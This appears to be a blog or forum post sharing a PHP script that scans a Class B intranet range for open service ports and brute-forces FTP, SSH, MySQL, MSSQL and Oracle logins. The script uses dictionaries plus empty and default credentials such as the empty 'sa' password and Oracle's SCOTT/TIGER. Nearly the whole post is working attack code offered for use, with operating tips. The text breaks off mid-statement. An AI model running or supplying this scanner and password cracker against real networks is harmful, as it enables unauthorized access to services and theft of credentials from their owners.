PHP Intranet scanning script + password cracking script/PHP Intranet cracking + password cracker

I wrote it when I had nothing to worry about a few days ago. I can scan segment B IP address and use the dictionary to crack some service passwords, such as FTP, SSH, MySQL, MSSQL, and Oracle, the system automatically attempts to empty passwords and weak passwords, such as anonymous ftp logon, SAS empty password of mssql, and oracle default password.

Scanning and cracking are single-threaded, and multiple threads require pcntl support. Because PHP does not include this function by default, no multithreading is added. Slow down.

Because the Web server times out, it is recommended that you scan 50 IP addresses each time.

 

< ?php #Class B PHP port scanner by anthrax @ insight-labs.orgsession_start();set_time_limit(0);ob_implicit_flush(True);ob_end_flush(); function check_port($ip,$port,$timeout=0.1) { $conn = @fsockopen($ip, $port, $errno, $errstr, $timeout); if ($conn) { fclose($conn); return true; }}function crackpwd($addr,$port,$userlist,$passlist,$type){switch($type){ case 'ftp':$ftp=@ftp_connect($addr,$port);if(@ftp_login($ftp,'anonymous','safasf#asfs.com')){echo "$addr".':'.$port.' Anonymous Login enabled'.'<br/>';}foreach($userlist as $username){foreach($passlist as $pass){if(@ftp_login($ftp,$username,$pass)){echo "FTP $addr".':'.$port.'Username: '.$username.' pwd: '.$pass.'<br />';}}}ftp_close($ftp);break; case 'mysql': if(@mysql_connect($addr.':'.$port, 'root', '')){echo 'MySQL Username: root EMPTY PASSWORD<br />';}foreach($userlist as $username){foreach($passlist as $pass){if(@mysql_connect($addr.':'.$port, $username, $pass)){echo 'MySQL Username: '.$username.' pwd: '.$pass.'<br />';}}}break; case 'mssql':if(@mssql_connect($addr,'sa','')){echo 'MSSQL Username: sa EMPTY PASSWORD<br />';}foreach($userlist as $username){foreach($passlist as $pass){if(@mssql_connect($addr, $username, $pass)){echo 'MSSQL Username: '.$username.' pwd: '.$pass.'<br />';}}}break; case 'oracle':if(@oci_connect('SCOTT','TIGER',$addr)){echo 'Oracle Username SCOTT pwd: TIGER';}if(@oci_connect('SYSTEM','MANAGER',$addr)){echo 'Oracle Username SYSTEM pwd: MANAGER';}if(@oci_connect('DBSNMP','DBSNMP',$addr)){echo 'Oracle Username DBSNMP pwd: DBSNMP';}foreach($userlist as $username){foreach($passlist as $pass){if(@oci_connect($username,$pass,$addr)){echo 'Oracle Username: '.$username.' pwd: '.$pass.'<br />';}}}break; case 'ssh':$ssh=@ssh2_connect($addr,'22');foreach($userlist as $username){foreach($passlist as $pass){if(@ssh2_auth_password($ssh,$username,$pass)){echo 'SSH Username: '.$username.' pwd: '.$pass.'<br />';}}}break;}} function scanip($ip,$timeout){$portarr=array('21'=>'FTP','22'=>'SSH','23'=>'Telnet','25'=>'SMTP','79'=>'Finger','80'=>'HTTP','81'=>'HTTP/Proxy','110'=>'POP3','135'=>'MS Netbios','139'=>'MS Netbios','143'=>'IMAP','162'=>'SNMP','389'=>'LDAP','443'=>'HTTPS','445'=>'MS SMB','873'=>'rsync','1080'=>'Proxy/HTTP Server','1433'=>'MS SQL Server','2433'=>'MS SQL Server Hidden','1521'=>'Oracle DB Server','1522'=>'Oracle DB Server','3128'=>'Squid Cache Server','3129'=>'Squid Cache Server','3306'=>'MySQL Server','3307'=>'MySQL Server','3500'=>'Squid Cache Server','3389'=>'MS Terminal Service','5800'=>'VNC Server','5900'=>'VNC Server','8080'=>'Proxy/HTTP Server','10000'=>'Webmin','11211'=>'Memcached' );foreach($portarr as $port=>$name){if(check_port($ip,$port,$timeout=0.1)==True){echo 'Port: '.$port.' '.$name.' is open<br />';@ob_flush();@flush(); if(isset($_SESSION['crack'])||$_SESSION['crack']==true){switch($port){ case '21':$type='ftp';break; case '22':$type='ssh';break; case '1433':$type='mssql';break; case '1521':case '1522':$type='oracle';break; case '3306':case '3307':$type='mysql';break; default:$type=false;}if($type){global $userarr,$passarr;crackpwd($ip,$port,$userarr,$passarr,$type); @ob_flush();@flush();} }//if}}} if(!isset($_SESSION['startip'])){$_SESSION['startip']='Start IP';$_SESSION['endip']='End IP';$_SESSION['username']='rootadmin';$_SESSION['password']='123456root123123adminqwerty';} echo '